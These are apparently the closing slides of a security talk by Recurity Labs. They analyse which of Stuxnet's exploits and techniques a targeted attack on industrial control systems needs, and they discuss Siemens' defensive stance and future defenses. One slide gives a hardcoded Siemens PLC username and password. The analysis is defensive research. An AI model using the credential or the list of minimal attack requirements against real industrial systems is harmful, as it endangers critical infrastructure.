  • 41. How Much Was Required? Attack Capability Required for Targeted Attack? CVE-2010-2568 LNK No CVE-2010-3888 Task Scheduler No CVE-2010-2743 Keyboard Layout No CVE-2010-2729 Print Spooler No CVE-2008-4250 Server Service RPC No Self-copying to network share No Peer-to-peer updating No C&C Servers No Windows rootkit & certificates No 10 AV product circumventions No Behavioral detection evasion No
  • 42. How Much Was Required? Attack Capability Required for Targeted Attack? Self-copying to WinCC Optional STEP7 project file infection Yes ICS process fingerprinting Yes STEP7 DLL Backdoor Optional PLC Virtualization Yes
  • 43. Relevant Techniques  Most of Stuxnet’s functionality is spreading, survival and persistence oriented  The measures taken are extreme  Targeted attacks on an industrial process only need a few key technologies  If the infection can be accomplished by human means, only the PLC payload stays relevant  Stuxnet demonstrates how it is done  There is still significant room for advancements, considering the complexity of Siemens S7  Similar attacks are very likely to be possible with any other PLC vendor’s equipment
  • 44. Only In Siemens-Land
    - Dillon Beresford showed another way at BlackHat USA 2011:
      - Username: basisk
      - Password: basisk
    - A compromised OS below the MC7 layer is obviously a game-over scenario for any security within the PLC network.
  • 45. CURRENT AND FUTURE DEFENSES
  • 46. Current Defenses
    - Siemens still postulates that it is the customer's job to secure its automation process
      - Code execution upon STEP7 project loading is not considered a vulnerability. No fix.
      - Code execution through fixed passwords on WinCC servers is not fixed. The password has been publicly known since 2008.
      - At least the fixed username and password in the PLC OS have supposedly been removed since 2009
    - Air gaps? Don't help, don't exist.
      - Infected consultants and service engineers
      - Process performance dashboards for management
      - Agile production environments in supplier fabs
    - Virus scanners?
      - Have not protected anything since 1970.
  • 47. Future Defenses
    - Frequent reprogramming of the entire automation environment
      - Proposed by process engineers
      - May actually be the best option today
    - Langner Controller Integrity Checker (CIC)
      - Developed as a response to Stuxnet
      - Promising first attempt at solving some of the problems
      - Evasion is obviously possible, as it suffers from the same detection-paradigm problem as AV software
      - Siemens specific, doesn't help with other automation environments
    - Neither helps when the underlying OS is infected
  • 48. Future Defenses
    - Future defenses can only be developed with a better understanding of the offense
      - Stuxnet targets a very specific environment
      - Currently flourishing research is completely utility centric (power, water, waste, railway)
    - Industrial Control Systems are extremely environment specific by nature
    - The best protection is to evaluate your own environment's vulnerability
      - Based on a solid threat model, developed around your business and your likely adversaries
      - The only approach that has been shown to work in other emerging threat areas before
  • 49. Thank You!
    Felix 'FX' Lindner, Head
    fx@recurity-labs.com
    Recurity Labs GmbH, Berlin, Germany
    http://www.recurity-labs.com
